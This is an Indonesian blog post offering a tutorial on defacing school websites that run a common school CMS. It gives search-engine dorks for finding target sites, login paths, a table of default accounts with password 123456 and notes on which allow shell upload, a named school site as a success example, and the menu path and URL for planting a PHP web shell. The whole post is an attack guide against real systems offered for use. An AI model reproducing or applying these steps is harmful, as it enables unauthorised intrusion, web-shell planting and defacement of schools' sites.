Selamat Pagi Sobat Blogger , Sekarang saya Ingin Membagi Tutorial
Deface Web Sekolah Dengan Teknik Default Password
Web Sekolah Pada Umunnya lemah , tapi ada juga yang aman atau kuat
tergantung Web Developmentnya
Ok Tanpa Panjang Lebar Silahkan Sedot Tutorial Di Bawah :
1.Buka Mbah Google Di http://www.google.com
2. Masukkan Dork
Dork in google..
1. inurl:"/html/index.php" intext:"Tim Balitbang"
2. inurl:"/html/index.php" intitle:"Selamat Datang"
3. inurl:"/member/" intext:"Tim Balitbang"
dork in bing..
1. IP:[target-IP] /html/
2. IP:[target-IP] sch.id
3. IP:[target-IP] ac.id
4. IP:[target-IP] blablablaa… having fun..
Pilih salah satu site yang akan di exploit
3.Masukin Exploitnya
Exploit : /member/index.php or /member/user.php
login member using default user and password
USERNAME PASSWORD DETAILS SHELL UPLOAD
kickdody 123456 guru aviable
070810120 123456 siswa not aviable
siswanto 123456 guru aviable
alumni 123456 guru not aviable
tomi 123456 guru aviable
alan 123456 guru aviable
Jika Login Berhasil Maka Anda Succes
http://ma.alkhairaat-ternate.or.id
Jika login Gagal Cari web Lain
Tahap Menanam Shell
SIM -> Data Laporan -> Tambah data laporan -> simpan -> sukses
Tempat shell berada :
site.sch.id/laporan/namashell.php
0 komentar:
Posting Komentar